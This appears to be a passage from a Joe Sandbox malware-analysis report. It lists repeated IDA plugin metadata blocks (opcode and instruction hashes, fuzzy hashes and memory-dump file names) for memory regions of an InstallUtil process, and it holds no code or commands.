                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9db1b77679bdd4786cec17428f19a285bfb9279bf2843b68fcd3332de89ee4c5
                                                                                                                          • Instruction ID: dba5901c7cc009fa71e86c484fb61237957c1122b3f4afc793f44601ba926e53
                                                                                                                          • Opcode Fuzzy Hash: 9db1b77679bdd4786cec17428f19a285bfb9279bf2843b68fcd3332de89ee4c5
                                                                                                                          • Instruction Fuzzy Hash: BAC08CB2804440CBC7108FA0A6986107B219788322F1A409ED6090F2E2C2328813EB00
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                                                                          • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                                                                                                                          • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                                                                          • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 099d4333f308308a9254cac8a25ddd2c564bcddf53b4e27a79bb81b420707c1d
                                                                                                                          • Instruction ID: f49d4f96fb9c7c47852ee67a2c16f1e71819416a14f9e2680fec16746a722714
                                                                                                                          • Opcode Fuzzy Hash: 099d4333f308308a9254cac8a25ddd2c564bcddf53b4e27a79bb81b420707c1d
                                                                                                                          • Instruction Fuzzy Hash: 79C04C74E42068DBFB54DB11ED51F5972F5BB84254F0082E5CA0D773A0D6356E81CF64
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a1b181a877c4c8b5097ca175a9117e11441aa51719e317497164a11dc9f50d4
                                                                                                                          • Instruction ID: 9a90b841376ce2e9a676a737f523a9345833365d8452d96317a8d84bb4397f97
                                                                                                                          • Opcode Fuzzy Hash: 6a1b181a877c4c8b5097ca175a9117e11441aa51719e317497164a11dc9f50d4
                                                                                                                          • Instruction Fuzzy Hash: 52B01234208004CF8244F6C8E740414B352DFC4218318C0AEA80CCF712CB33EC038640
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 495f4a3084cba5c9441c0886f22c92c826f31c1a085ea4eb671b674680b88307
                                                                                                                          • Instruction ID: e3035e1df7ffdbc822d593d919369507016f68dfc9301ef73b291b06a96b9eaf
                                                                                                                          • Opcode Fuzzy Hash: 495f4a3084cba5c9441c0886f22c92c826f31c1a085ea4eb671b674680b88307
                                                                                                                          • Instruction Fuzzy Hash: 27B0123BB400199ACB00D6C8F4504ECFB30EBD4332F004033C300620008B31157AC760
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e20f7cd7afed99e60c02252a9db1c6562a7f5c312db12e28109d524c54bbf2b1
                                                                                                                          • Instruction ID: b6d074a531417ce5efee044fc7df5a4387fc9f51c61cfde2100974b93bb56db9
                                                                                                                          • Opcode Fuzzy Hash: e20f7cd7afed99e60c02252a9db1c6562a7f5c312db12e28109d524c54bbf2b1
                                                                                                                          • Instruction Fuzzy Hash: 7DC04C74746200DBDB54AF26E918E6877B1EB88312F040075A507C3398DF3C9C95CF00
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c1f1ffc6563b5dddf45b604b5295224396605bf93a5b4528ceb32de38eb73576
                                                                                                                          • Instruction ID: 91979cbc4b0212db875fecf28793fa86f41017b83ce9b093b6b1e4a8e1f8e2a6
                                                                                                                          • Opcode Fuzzy Hash: c1f1ffc6563b5dddf45b604b5295224396605bf93a5b4528ceb32de38eb73576
                                                                                                                          • Instruction Fuzzy Hash: CCA02230003B0C838A0032F82003223338C288220838008BEA20C08E230C33E0A0808C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a4a2a0a44381aa2bda737fe892d9c23aa57e5d7916b19dc24501f842be437f3a
                                                                                                                          • Instruction ID: de5f963939e364922758a52304f3a99e9cc610007b9333af09e614d8d2b445a4
                                                                                                                          • Opcode Fuzzy Hash: a4a2a0a44381aa2bda737fe892d9c23aa57e5d7916b19dc24501f842be437f3a
                                                                                                                          • Instruction Fuzzy Hash: 67A02230082B0C828F0032F8200322033AC28802083C000F8A20C08E220833E0A08088
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7360b7b043b0817b30753a36439381e8f62aaa23d7b1c881a75d6b498bad34bb
                                                                                                                          • Instruction ID: 4160213894556790463e0593d54b18b8e80366c72c63bb77cd38bfa080f123ab
                                                                                                                          • Opcode Fuzzy Hash: 7360b7b043b0817b30753a36439381e8f62aaa23d7b1c881a75d6b498bad34bb
                                                                                                                          • Instruction Fuzzy Hash: 0D90023104960C8B454027957419599779CD54462678100A2E51D425016A5B785055A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6fef0cda10d06c9a9e2430454720f754c554b80d1b725370a2b5d4a7d20d086
                                                                                                                          • Instruction ID: 54a9084d2d0d6a8038c3f40130586a86786cbd723f3ad1f2e79144949fa17f25
                                                                                                                          • Opcode Fuzzy Hash: b6fef0cda10d06c9a9e2430454720f754c554b80d1b725370a2b5d4a7d20d086
                                                                                                                          • Instruction Fuzzy Hash: